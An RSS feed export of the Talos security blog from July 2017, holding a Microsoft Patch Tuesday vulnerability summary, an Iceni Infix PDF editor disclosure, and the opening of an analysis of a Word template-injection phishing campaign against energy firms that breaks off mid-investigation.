<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0"><channel><title>Talos Blog</title><link>http://blog.talosintelligence.com/</link><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://feeds.feedburner.com/feedburner/Talos" /><description>Talos Group, by Cisco</description><language>en</language><managingEditor>noreply@blogger.com (Nick Biasini)</managingEditor><lastBuildDate>Wed, 12 Jul 2017 06:10:14 PDT</lastBuildDate><generator>Blogger</generator><atom:id xmlns:atom="http://www.w3.org/2005/Atom">tag:blogger.com,1999:blog-1029833275466591797</atom:id><openSearch:totalResults xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/">706</openSearch:totalResults><openSearch:startIndex xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/">1</openSearch:startIndex><openSearch:itemsPerPage xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/">25</openSearch:itemsPerPage><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://feeds.feedburner.com/feedburner/Talos" /><feedburner:info uri="feedburner/talos" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><feedburner:emailServiceId>feedburner/Talos</feedburner:emailServiceId><feedburner:feedburnerHostname>https://feedburner.google.com</feedburner:feedburnerHostname><item><title>Microsoft Patch Tuesday  - July 2017</title><link>http://feedproxy.google.com/~r/feedburner/Talos/~3/21ZcWIIsN98/ms-tuesday.html</link><category>Coverage</category><category>Microsoft</category><category>ms tuesday</category><category>patch tuesday</category><category>Snort Rules</category><category>Talos</category><author>noreply@blogger.com (William 
Largent)</author><pubDate>Tue, 11 Jul 2017 12:59:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1029833275466591797.post-6346785117187266706</guid><description>Today, Microsoft has released their monthly set of security updates designed to address vulnerabilities. This month's release addresses 54 vulnerabilities, with 19 of them rated critical, 32 rated important, and 3 rated moderate. Impacted products include Edge, .NET Framework, Internet Explorer, Office, and Windows.&lt;br /&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;h3&gt;Vulnerabilities Rated Critical&lt;/h3&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8463&lt;/h4&gt;&lt;div&gt;This is a remote code execution vulnerability related to the way that Windows Explorer handles executable files and shares during rename operations. If exploited, this vulnerability could run arbitrary code; users not running as administrators would be less affected. This vulnerability can be triggered via a malicious shared folder and malware named with an executable extension.&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;h4&gt;CVE-2017-8584&lt;/h4&gt;A remote code execution vulnerability exists when HoloLens improperly handles objects in memory. An attacker who successfully exploited this vulnerability could take control of an affected system and could then install programs; view, change, or delete data; or create new accounts with full user rights. To exploit this vulnerability, an attacker would need to send a specially crafted WiFi packet.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8589&lt;/h4&gt;This is a remote code execution vulnerability in Windows Search related to the improper handling of objects in memory. 
This can be exploited by an attacker sending a specially crafted SMB message to the Windows Search service.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8594&lt;/h4&gt;A remote code execution vulnerability exists in Internet Explorer that could corrupt memory in such a way that an attacker could execute arbitrary code with the current user's privileges. If the current user is logged on with administrative user rights, the attacker could take control of an affected system and could then install programs; view, change, or delete data; or create new accounts with full user rights. This can be exploited by a user visiting a specially crafted webpage.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8595 / CVE-2017-8596 / CVE-2017-8617&lt;/h4&gt;A remote code execution vulnerability exists in Microsoft Edge that could corrupt memory in such a way that an attacker could execute arbitrary code with the current user's privileges. If the current user is logged on with administrative user rights, the attacker could take control of an affected system and could then install programs; view, change, or delete data; or create new accounts with full user rights. This can be exploited by a user visiting a specially crafted webpage. In addition, an attacker could embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the browser rendering engine.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8598&lt;/h4&gt;This is a remote code execution vulnerability in Microsoft Edge related to the improper handling of objects in memory. The resulting memory corruption could result in arbitrary code execution. This can be exploited by having a user view a specially crafted website or via an ActiveX control marked "safe for initialization" in an application or Microsoft Office document. 
&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8601&lt;/h4&gt;This is a remote code execution vulnerability in the Chakra JavaScript engine in Microsoft browsers related to improper handling of objects in memory. Exploitation can occur through a specially crafted website or an ActiveX control marked "safe for initialization", resulting in the attacker taking full control of the affected system.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8603&lt;/h4&gt;This is a remote code execution vulnerability in Microsoft Edge related to the way the engine handles objects in memory. The resulting corruption of memory can result in arbitrary code execution. This can be exploited by a user visiting a specially crafted webpage.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8604&lt;/h4&gt;This is a remote code execution vulnerability in Microsoft Edge related to the improper handling of objects in memory. The resulting memory corruption could result in arbitrary code execution. This can be exploited by having a user view a specially crafted website or via an ActiveX control marked "safe for initialization" in an application or Microsoft Office document.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8605&lt;/h4&gt;This is a remote code execution vulnerability in Microsoft Edge related to the improper handling of objects in memory. The resulting memory corruption could result in arbitrary code execution. This can be exploited by having a user view a specially crafted website or via an ActiveX control marked "safe for initialization" in an application or Microsoft Office document.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8606 / CVE-2017-8607 / CVE-2017-8608 / CVE-2017-8609&lt;/h4&gt;This is a remote code execution vulnerability in the JavaScript engines in Microsoft browsers related to improper handling of objects in memory. Exploitation can occur through the viewing of a specially crafted website and can result in the attacker gaining the same user rights as the current user. 
&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8610&lt;/h4&gt;This is a remote code execution vulnerability in Microsoft Edge related to the improper handling of objects in memory. The resulting memory corruption could result in arbitrary code execution. This can be exploited by having a user view a specially crafted website or via an ActiveX control marked "safe for initialization" in an application or Microsoft Office document.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8618&lt;/h4&gt;This is a remote code execution vulnerability in the way the VBScript engine, when rendered in Internet Explorer, handles objects in memory. Exploitation can occur through the viewing of a specially crafted website and can result in the attacker gaining the same user rights as the current user.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8619&lt;/h4&gt;This is a remote code execution vulnerability in Microsoft's Edge browser related to improper access of objects in memory. The resulting memory corruption can result in arbitrary code execution. This can be exploited by a user visiting a specially crafted website.&lt;br /&gt;&lt;br /&gt;&lt;h3&gt;Vulnerabilities Rated Moderate&lt;/h3&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-0170&lt;/h4&gt;An information disclosure vulnerability exists in the Windows Performance Monitor Console when it improperly parses XML input. An attacker who successfully exploited this vulnerability could read arbitrary files via an XML external entity (XXE). To exploit the vulnerability, an attacker could create specially crafted XML data and convince an authenticated user to create a Data Collector Set and import the file. To create a Data Collector Set, the user must be a member of the Performance Log Users or Local Administrators group.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8611&lt;/h4&gt;This is a spoofing vulnerability in Microsoft Edge when it does not properly parse HTTP content. 
An attacker could use a crafted website to either spoof content or serve as a pivot to chain an attack with other vulnerabilities.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8621&lt;/h4&gt;An open redirect vulnerability exists in Microsoft Exchange that could lead to spoofing. To exploit the vulnerability, an attacker could send a crafted URL; when an authenticated Exchange user clicks the link, the user's browser session could be redirected to a malicious site that is designed to impersonate a legitimate website. By doing so, the attacker could trick the user and potentially acquire sensitive information, such as the user's credentials.&lt;br /&gt;&lt;br /&gt;&lt;h3&gt;Vulnerabilities Rated Important&lt;/h3&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-0243&lt;/h4&gt;A remote code execution vulnerability exists in Microsoft Office software when it fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could perform actions with the privileges of the current user. This can be exploited by having a user open a specially crafted file.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8467&lt;/h4&gt;An elevation of privilege vulnerability exists in Windows when the Microsoft Graphics Component fails to properly handle objects in memory. This is exploitable by a local attacker executing a specially crafted application to elevate privilege.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8486&lt;/h4&gt;This is an information disclosure vulnerability in Microsoft Windows when Win32k fails to properly handle objects in memory. This can be triggered by an authenticated attacker executing a specially crafted application.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8495&lt;/h4&gt;A security feature bypass vulnerability exists in Microsoft Windows when Kerberos fails to prevent tampering with the SNAME field during ticket exchange. 
Successful exploitation of this vulnerability could be used to bypass Extended Protection for Authentication.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8501 / CVE-2017-8502&lt;/h4&gt;These are remote code execution vulnerabilities in Microsoft Office related to improper handling of objects in memory. Exploitation occurs when a user opens a specially crafted file. This file could be delivered via an email message or be hosted on a website.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8556&lt;/h4&gt;An elevation of privilege vulnerability exists in Windows when the Microsoft Graphics Component fails to properly handle objects in memory. This is exploitable by a local attacker executing a specially crafted application to elevate privilege.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8557&lt;/h4&gt;An information disclosure vulnerability exists in the Windows System Information Console when it improperly parses XML input. An attacker who successfully exploited this vulnerability could read arbitrary files via an XML external entity (XXE). To exploit the vulnerability, an attacker could create specially crafted XML data.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8559 / CVE-2017-8560&lt;/h4&gt;An elevation of privilege vulnerability exists when Microsoft Exchange Outlook Web Access (OWA) fails to properly handle web requests. Exploitation occurs by an authenticated attacker sending a specially crafted request.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8561&lt;/h4&gt;This is a privilege escalation vulnerability in the Windows Kernel related to the improper handling of objects in memory. This is exploitable by a local attacker executing a specially crafted application to elevate privilege.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8562&lt;/h4&gt;There is a privilege escalation vulnerability in Windows when it improperly handles calls to Advanced Local Procedure Call (ALPC). 
This is exploitable by a local attacker executing a specially crafted application to elevate privilege.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8563&lt;/h4&gt;An elevation of privilege vulnerability exists in Microsoft Windows when Kerberos falls back to the NT LAN Manager (NTLM) Authentication Protocol as the default authentication protocol. This is exploitable by a local attacker executing a specially crafted application to send malicious traffic to a domain controller.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8564&lt;/h4&gt;This is an information disclosure vulnerability in the Windows Kernel related to the improper handling of objects in memory. This is exploitable by a local attacker executing a crafted application, allowing the attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (KASLR) bypass.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8565&lt;/h4&gt;This is a remote code execution vulnerability within PowerShell when PSObject wraps a CIM Instance. An attacker who successfully exploited this vulnerability could execute malicious code on a vulnerable system.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8566&lt;/h4&gt;This is an elevation of privilege vulnerability in the Windows Input Method Editor (IME) when IME improperly handles parameters in a method of a DCOM class. The DCOM server is a Windows component installed regardless of which languages/IMEs are enabled, and an attacker can instantiate the DCOM class and exploit the system even if IME is not enabled. This is exploitable by a local attacker executing a specially crafted application to elevate privilege.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8569&lt;/h4&gt;An elevation of privilege vulnerability exists in Microsoft SharePoint Server when it does not properly sanitize a specially crafted web request. An authenticated attacker could exploit the vulnerability by sending a specially crafted request to an affected SharePoint server. 
If successful, the attacker could then perform cross-site scripting attacks on affected systems and run scripts with the privileges of the current user. This can allow the attacker to read content they are not authorized to read, use the victim's identity to take actions on the SharePoint site on behalf of the user, such as changing permissions and deleting content, and inject malicious content into the user's browser.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8570&lt;/h4&gt;A remote code execution vulnerability exists in Microsoft Office software when it fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could perform actions with the privileges of the current user. This can be exploited by having a user open a specially crafted file.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8573 / CVE-2017-8574 / CVE-2017-8577 / CVE-2017-8578 / CVE-2017-8580&lt;/h4&gt;An elevation of privilege vulnerability exists in the Microsoft Graphics Component. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8581&lt;/h4&gt;An elevation of privilege vulnerability exists when Windows improperly handles objects in memory. An authenticated attacker who successfully exploited this vulnerability could run processes in an elevated context.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8582&lt;/h4&gt;An information disclosure vulnerability exists when the HTTP.sys server application component improperly handles objects in memory. A remote unauthenticated attacker could exploit this vulnerability by issuing a request to the server application.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8585&lt;/h4&gt;This is a denial of service vulnerability when the Microsoft Common Object Runtime Library improperly handles web requests. 
A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the .NET application. This attack could cause a denial of service on the target system, requiring a reboot to resolve.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8587&lt;/h4&gt;A denial of service vulnerability exists when Windows Explorer attempts to open a non-existent file. An attacker could exploit this vulnerability by hosting a specially crafted website containing a reference to the non-existent file and convincing a user to browse to the page, causing the victim's system to stop responding.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8588&lt;/h4&gt;A remote code execution vulnerability exists in the way that Microsoft WordPad parses specially crafted files. Exploitation of this vulnerability requires that a user open a specially crafted file with an affected version of Microsoft WordPad. An attacker could exploit the vulnerability by sending a specially crafted file to the user via email.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8590&lt;/h4&gt;An elevation of privilege vulnerability exists in the Windows Common Log File System (CLFS). A locally authenticated attacker could exploit this vulnerability by running a specially crafted application to take control of the affected system. An attacker who successfully exploited this vulnerability could run processes in an elevated context.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8592&lt;/h4&gt;A security feature bypass vulnerability exists when Microsoft Browsers improperly handle redirect requests. This vulnerability allows Microsoft Browsers to bypass CORS redirect restrictions and follow redirect requests that should otherwise be ignored. 
An attacker who successfully exploited this vulnerability could force the browser to send data that would otherwise be restricted to a destination website of their choice.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8599&lt;/h4&gt;A security feature bypass vulnerability exists when Microsoft Edge fails to correctly apply the Same Origin Policy for HTML elements present in other browser windows. This can be exploited by a user visiting a specially crafted webpage.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8602&lt;/h4&gt;This is a spoofing vulnerability in Microsoft browsers when they do not properly parse HTTP content. An attacker could use a crafted website to either spoof content or serve as a pivot to chain an attack with other vulnerabilities.&lt;br /&gt;&lt;br /&gt;&lt;h3&gt;Coverage&lt;/h3&gt;&lt;br /&gt;In response to these bulletin disclosures, Talos is releasing the following rules to address these vulnerabilities. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Management Center or Snort.org.&lt;br /&gt;&lt;br /&gt;Snort Rules:&lt;br /&gt;42753&lt;br /&gt;42755-42756&lt;br /&gt;43460-43463&lt;br /&gt;43465-43466&lt;br /&gt;43469-43474&lt;br /&gt;43490-43493&lt;br /&gt;43521-43522</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2017-07-11T15:59:29.721-04:00</atom:updated><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.talosintelligence.com/2017/07/ms-tuesday.html</feedburner:origLink></item><item><title>Vulnerability Spotlight: Iceni Infix PDF Editor Memory Corruption</title><link>http://feedproxy.google.com/~r/feedburner/Talos/~3/H49ZIv0xXd4/iceni-infix-pdf.html</link><category>0-day</category><category>iceni</category><category>Vulnerability Research</category><category>vulnerability spotlight</category><author>noreply@blogger.com (Nick Biasini)</author><pubDate>Tue, 11 Jul 2017 07:29:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1029833275466591797.post-8012137625585732939</guid><description>Today, Talos is disclosing a vulnerability that has been identified in Iceni Infix PDF Editor that could lead to arbitrary code execution on affected hosts. This vulnerability manifests in a way that could be exploited if a user opens a specifically crafted PDF file that triggers this flaw. Talos has coordinated with Iceni to ensure relevant details regarding the vulnerability have been shared. Iceni has developed a software update that addresses this vulnerability. In addition, Talos has developed Snort rules that can detect attempts to exploit this flaw.&lt;br /&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;h2 id="h.olijqix0wqh7"&gt;Vulnerability Details&lt;/h2&gt;TALOS-2017-0367 was identified by Piotr Bania of Talos.&lt;br /&gt;&lt;br /&gt;TALOS-2017-0367 (CVE-2017-2863) is a memory corruption vulnerability in Iceni Infix that could be leveraged to achieve arbitrary code execution on the affected device. TALOS-2017-0367 manifests as an out-of-bounds write flaw in the PDF parsing functionality. 
Exploitation is possible if a user were to open a specifically crafted PDF file that targets this vulnerability. The most likely form of attack would be a social engineering scenario where a user receives an email containing a malicious PDF that exploits this vulnerability.&lt;br /&gt;&lt;br /&gt;For more technical details, please read our advisory &lt;a href="https://www.talosintelligence.com/reports/TALOS-2017-0367"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;h2 id="h.buhka1mosi6o"&gt;Coverage&lt;/h2&gt;Talos has developed the following Snort rules to detect attempts to exploit this vulnerability. Note that these rules are subject to change pending additional vulnerability information. For the most current information, please visit your Firepower Management Center or Snort.org.&lt;br /&gt;&lt;br /&gt;Snort Rules: 43212-43213&lt;br /&gt;&lt;br /&gt;For other vulnerabilities Talos has disclosed, please refer to our Vulnerability Report Portal: &lt;a href="http://www.talosintelligence.com/vulnerability-reports/"&gt;http://www.talosintelligence.com/vulnerability-reports/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;To review our Vulnerability Disclosure Policy, please visit this site:&lt;br /&gt;&lt;a href="http://www.cisco.com/c/en/us/about/security-center/vendor-vulnerability-policy.html"&gt;http://www.cisco.com/c/en/us/about/security-center/vendor-vulnerability-policy.html&lt;/a&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2017-07-11T10:30:33.452-04:00</atom:updated><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.talosintelligence.com/2017/07/iceni-infix-pdf.html</feedburner:origLink></item><item><title>Attack on Critical Infrastructure Leverages Template Injection</title><link>http://feedproxy.google.com/~r/feedburner/Talos/~3/sNpalbGj2jI/template-injection.html</link><category>SMB Malware Energy</category><author>noreply@blogger.com (Earl Carter)</author><pubDate>Fri, 07 Jul 2017 13:34:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1029833275466591797.post-2692794276796878969</guid><description>Contributors: &lt;a href="https://www.linkedin.com/in/seanrichardbaird/"&gt;Sean Baird&lt;/a&gt;, &lt;a href="https://www.blogger.com/profile/07833323932899203321"&gt;Earl Carter&lt;/a&gt;, &lt;a href="http://twitter.com/krabsonsecurity"&gt;Erick Galinkin&lt;/a&gt;, &lt;a href="https://www.linkedin.com/in/christophermarczewski/"&gt;Christopher Marczewski&lt;/a&gt; &amp;amp; &lt;a href="https://twitter.com/ImmortanJo3"&gt;Joe Marshall&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;h2&gt;Executive Summary&lt;/h2&gt;&lt;br /&gt;Attackers are continually trying to find new ways to target users with malware sent via email. Talos has identified an email-based attack targeting the energy sector, including nuclear power, that puts a new spin on the classic Word document attachment phish. Typically, malicious Word documents that are sent as attachments to phishing emails will themselves contain a script or macro that executes malicious code. In this case, there is no malicious code in the attachment itself. 
The attachment instead tries to download a template file over an SMB connection so that the user's credentials can be silently harvested. In addition, this template file could also potentially be used to download other malicious payloads to the victim's computer.&lt;br /&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-M7_TVig0AcU/WV_2Dubji2I/AAAAAAAAAOU/PjPQDCPcQ48pZhZcBc84OYwn02UQTEcNgCEwYBhgL/s1600/talos-social.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="627" data-original-width="1200" height="208" src="https://3.bp.blogspot.com/-M7_TVig0AcU/WV_2Dubji2I/AAAAAAAAAOU/PjPQDCPcQ48pZhZcBc84OYwn02UQTEcNgCEwYBhgL/s400/talos-social.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h2&gt;Background&lt;/h2&gt;&lt;br /&gt;Since at least May 2017, Talos has observed attackers targeting critical infrastructure and energy companies around the world, primarily in Europe and the United States. These attacks target both the critical infrastructure providers and the vendors those providers use to deliver critical services. Attacks on critical infrastructure are not a new concern for security researchers, as adversaries are keen to understand critical infrastructure ICS networks for reasons unknown, but surely nefarious.&lt;br /&gt;&lt;br /&gt;One objective of this most recent attack appears to be to harvest the credentials of users who work within critical infrastructure and manufacturing industries. Using a new twist on an old attack method, a clever adversary stole credentials from their victims by sending malicious Word documents via email. 
These documents, when opened, attempt to retrieve a template file from an attacker-controlled external SMB server.&lt;br /&gt;&lt;br /&gt;&lt;h2&gt;Technical Investigation&lt;/h2&gt;&lt;br /&gt;In the midst of recent attack trends and global campaigns, it has become easier to pass over simple techniques that have served attackers' interests for years. As Talos has recently observed, sometimes new takes on reliable techniques can make them even more effective.&lt;br /&gt;&lt;br /&gt;While investigating a recently reported attack and pivoting on the data provided, we landed on several interesting DOCX samples which were delivered as attachments in malicious spam emails. As shown below, these documents often claimed to be environmental reports or resumés/CVs.&lt;br /&gt;&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-hbtJ8O9-dVI/WV_mogDXuDI/AAAAAAAAANk/V8qFZAC7WIQn3GCx-7IdBsJRBpWf9gNGgCLcBGAs/s1600/image5.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" data-original-height="627" data-original-width="1600" height="249" src="https://4.bp.blogspot.com/-hbtJ8O9-dVI/WV_mogDXuDI/AAAAAAAAANk/V8qFZAC7WIQn3GCx-7IdBsJRBpWf9gNGgCLcBGAs/s640/image5.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Sample email containing a malicious document&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-4bq7xG7VppY/WV_nK4PkZkI/AAAAAAAAANo/gF40I3Ayk1YnPsOHME2H92DwbwVrVUdbQCLcBGAs/s1600/image6.png" 
imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" data-original-height="1130" data-original-width="1600" height="450" src="https://3.bp.blogspot.com/-4bq7xG7VppY/WV_nK4PkZkI/AAAAAAAAANo/gF40I3Ayk1YnPsOHME2H92DwbwVrVUdbQCLcBGAs/s640/image6.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;One DOCX sample used during this attack&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-5gBa-QSqir4/WV_nYAkzf7I/AAAAAAAAANs/-XMKtTtA4gQKVgcLcxQMCjmGa3BFihM8gCLcBGAs/s1600/image4.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" data-original-height="1128" data-original-width="1600" height="450" src="https://2.bp.blogspot.com/-5gBa-QSqir4/WV_nYAkzf7I/AAAAAAAAANs/-XMKtTtA4gQKVgcLcxQMCjmGa3BFihM8gCLcBGAs/s640/image4.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Another DOCX sample used during this attack&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;Our first expectation was that we would find some malicious VBA macros or embedded scripting within the sample itself. 
Examination of the VBA code provided no such leads:&lt;br /&gt;&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-uItWiRZ0zyg/WV_nfOHzyvI/AAAAAAAAANw/TsH-ePQbgyoeer5Y1WGfQNZvv5sMMOspwCLcBGAs/s1600/image9.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" data-original-height="127" data-original-width="637" height="126" src="https://1.bp.blogspot.com/-uItWiRZ0zyg/WV_nfOHzyvI/AAAAAAAAANw/TsH-ePQbgyoeer5Y1WGfQNZvv5sMMOspwCLcBGAs/s640/image9.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Analysis of the document using oletools&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;We confirmed this by running the sample against another similar tool:&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-y823HJm7b10/WV_nkxfveyI/AAAAAAAAAN0/FompxNcn5VshkEqYIqPE3DTb0E2z_2XLwCLcBGAs/s1600/image10.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" data-original-height="461" data-original-width="773" height="380" src="https://2.bp.blogspot.com/-y823HJm7b10/WV_nkxfveyI/AAAAAAAAAN0/FompxNcn5VshkEqYIqPE3DTb0E2z_2XLwCLcBGAs/s640/image10.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Further analysis of the DOCX&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;Again, none of the usual indicators of an embedded binary that would contain such code appeared in our analysis. 
The sample had been acquired from our sandbox by researching an IP address related to the attack, but the server was no longer accepting such requests at the time of the sandbox run. While we investigated other leads, we set up an isolated environment with a server listening on TCP 80 to determine what the document was trying to obtain, if anything.&lt;br /&gt;&lt;br /&gt;At the loading screen for Word, we noticed something interesting:&lt;br /&gt;&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-vxnNdT0YnvU/WV_nrcWKyoI/AAAAAAAAAN4/oBwYRkPdDIQP2nX-OX4JP5RGU7sGWWI3gCLcBGAs/s1600/image8.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" data-original-height="983" data-original-width="1600" height="392" src="https://1.bp.blogspot.com/-vxnNdT0YnvU/WV_nrcWKyoI/AAAAAAAAAN4/oBwYRkPdDIQP2nX-OX4JP5RGU7sGWWI3gCLcBGAs/s640/image8.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Word attempting to load a template&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;The document was trying to pull down a template file from a particular IP, but no connection over TCP 80 had yet reached our decoy server. Sure enough, our live capture showed a failed handshake over TCP 445 instead. It was now time to manually parse the contents of the document for the IP address in question. 
